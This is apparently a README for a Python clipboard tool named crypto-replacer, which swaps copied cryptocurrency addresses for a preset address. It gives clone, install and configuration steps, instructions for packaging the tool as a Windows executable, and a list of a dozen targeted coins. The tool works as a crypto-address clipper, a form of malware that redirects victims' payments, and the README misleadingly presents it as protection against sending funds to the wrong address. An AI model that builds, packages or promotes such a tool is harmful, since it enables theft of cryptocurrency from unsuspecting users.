This script is a tool to automatically replace cryptocurrency addresses in the clipboard with a predefined address. This can be useful to avoid accidentally sending cryptocurrency to the wrong address.
pyperclip
time
re
ctypes
os
sys
inspect
git clone https://github.com/matifanger/crypto-replacer
cd crypto-replacer
pip3 install -r requirements.txt
Open (crypto-replacer.py
).
Look for variable (my_addresses
) and setup with anything you want.
When the configuration is done you should make the executable (.exe
) to work in windows.
pip install auto-py-to-exe
then
auto-py-to-exe
In Auto Py To Exe (Mandatory)
One directory
Console based
Proper usage here
- Bitcoin
- Ethereum
- Dash
- Cardano
- Polkadot
- Ripple
- Tron
- Litecoin
- Monero
- Doge
- Solana
- Add more cryptos
- Add linux support